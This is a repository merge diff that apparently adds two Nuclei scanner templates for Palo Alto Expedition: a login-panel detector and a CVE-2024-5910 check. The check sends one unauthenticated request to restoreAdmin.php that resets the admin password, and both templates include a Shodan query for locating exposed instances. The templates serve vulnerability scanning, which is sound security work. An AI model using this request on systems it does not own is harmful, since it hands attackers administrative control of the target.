Merge pull request #10972 from johnk3r/main

paloalto-expedition-project-panel + CVE-2024-5910
2024-10-15 11:38:57 +04:00 · 2024-10-15 11:38:57 +04:00 · cf523091d8
parent b2f9658bfb 1662f5bed8
commit cf523091d8
2 changed files with 76 additions and 0 deletions
--- a/http/cves/2024/CVE-2024-5910.yaml
+++ b/http/cves/2024/CVE-2024-5910.yaml
@ -0,0 +1,42 @@
+id: CVE-2024-5910
+
+info:
+  name: Palo Alto Expedition - Admin Account Takeover
+  author: johnk3r
+  severity: critical
+  description: |
+    Missing authentication for a critical function in Palo Alto Networks Expedition can lead to an Expedition admin account takeover for attackers with network access to Expedition.
+  reference:
+    - https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise
+    - https://security.paloaltonetworks.com/CVE-2024-5910
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-5910
+  classification:
+    cve-id: CVE-2024-5910
+    cvss-score: 9.3
+    cwe-id: CWE-306
+    epss-score: 0.00043
+    epss-percentile: 0.10397
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: paloaltonetworks
+    product: expedition
+    shodan-query: http.favicon.hash:1499876150
+  tags: cve,cve2024,palo-alto,auth-bypass
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/OS/startup/restore/restoreAdmin.php"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Admin user found"
+          - "Admin password restored"
+        condition: and
+
+      - type: status
+        status:
+          - 200
--- a/http/exposed-panels/paloalto-expedition-panel.yaml
+++ b/http/exposed-panels/paloalto-expedition-panel.yaml
@ -0,0 +1,34 @@
+id: paloalto-expedition-panel
+
+info:
+  name: Palo Alto Expedition Project Login - Detect
+  author: johnk3r
+  severity: info
+  description: |
+    Palo Alto Expedition Project login panel was detected.
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: paloaltonetworks
+    product: expedition
+    shodan-query: http.favicon.hash:1499876150
+  tags: panel,expedition,palo-alto,login,detect
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    host-redirects: true
+    max-redirects: 2
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>Expedition Project</title>"
+
+      - type: status
+        status:
+          - 200